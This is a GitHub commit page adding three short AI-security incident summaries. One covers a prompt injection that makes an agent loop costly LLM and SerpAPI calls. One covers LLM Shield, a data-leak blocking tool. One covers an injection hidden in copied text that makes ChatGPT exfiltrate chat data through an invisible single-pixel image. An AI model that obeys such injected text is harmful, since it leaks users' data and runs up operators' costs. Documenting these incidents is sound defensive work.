Skip to content

Commit

Permalink
Add incidents #1
Browse files Browse the repository at this point in the history
  • Loading branch information
pigri committed Jul 29, 2024
1 parent bba1481 commit 53c2cfd
Show file tree
Hide file tree
Showing 3 changed files with 27 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
+++
title = 'Prompt Injection Attack Against LLM App'
date = 2022-12-29
+++
🚨 Watch how I can run up a $1000 bill with a single call to a poorly protected LLM app 🚨

This article discusses a prompt injection attack against an agent by tricking it into repeatedly calling the LLM and SerpAPI, quickly racking up costs. The attack shows how vulnerabilities in large language model applications can be exploited to generate significant financial damage.

[More details here](https://twitter.com/hwchase17/status/1608467493877579777)
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
+++
title = 'AI Data Leak Crisis: New Tool Prevents Company Secrets from Being Fed to ChatGPT'
date = 2023-04-25
+++
The meteoric rise in the everyday use of artificial intelligence has raised the risk of workers inadvertently leaking sensitive company data to AI-powered tools like ChatGPT. Samsung recently experienced leaks after employees pasted source code into the new bot, potentially exposing proprietary information.

Tech entrepreneur Wayne Chang has developed LLM Shield, a new tool to block leaks of sensitive data to large language models like ChatGPT. LLM Shield uses "technology to fight technology" by scanning everything downloaded or transmitted by a worker and blocking sensitive data from being entered into AI tools, including ChatGPT, Google's Bard, and Microsoft's Bing.

[More details here](https://www.foxbusiness.com/technology/ai-data-leak-crisis-new-tool-prevents-company-secrets-being-fed-chatgpt)
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
+++
title = 'ChatGPT Prompt Injection Attack via Single-Pixel Image'
date = 2023-05-29
+++
A new prompt injection attack targets users of the ChatGPT web version, allowing modification of chatbot answers with an invisible single-pixel markdown image that exfiltrates sensitive chat data to a malicious third-party. The attack can be extended to affect all future answers and make the injection persistent. It combines a set of tricks to deceive users without exploiting any vulnerabilities.

The attack scenario involves a user copying text from an attacker’s website, with the malicious prompt injected into the copied text. When the user sends this text to ChatGPT, the chatbot appends a single-pixel image to its response, sending the sensitive data to the attacker’s server. This can lead to sensitive data leakage, insertion of phishing links, and pollution of ChatGPT output.

[More details here](https://systemweakness.com/new-prompt-injection-attack-on-chatgpt-web-version-ef717492c5c2)

0 comments on commit 53c2cfd

Please sign in to comment.